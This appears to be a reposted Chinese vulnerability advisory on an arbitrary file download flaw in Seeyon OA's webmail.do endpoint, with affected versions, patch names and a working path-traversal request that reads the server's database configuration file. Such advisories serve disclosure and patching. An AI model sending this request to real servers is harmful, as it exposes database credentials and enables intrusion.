致遠OA 任意文件下載漏洞(webmail.do文件)


介紹

致遠OA是北京致遠互聯軟件股份有限公司研發一款辦公系統。

漏洞詳情及危害

致遠OA webmail.do文件讀取漏洞,
由於 /seeyon/webmail.do 頁面 filePath 參數過濾不嚴,導致可以讀取系統敏感文件。

通過修改filePath參數來下載服務器文件
/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

影響范圍

A6-V5、A8-V5

漏洞利用

訪問

http://xx.xx.xxx.xx/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

datasourceCtp.properties文件內容為:

漏洞修復

V5-webmail任意文件下載漏洞補丁
G6-webmail任意文件下載漏洞補丁

來源

致遠OA存在任意文件下載漏洞
致遠安全補丁


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM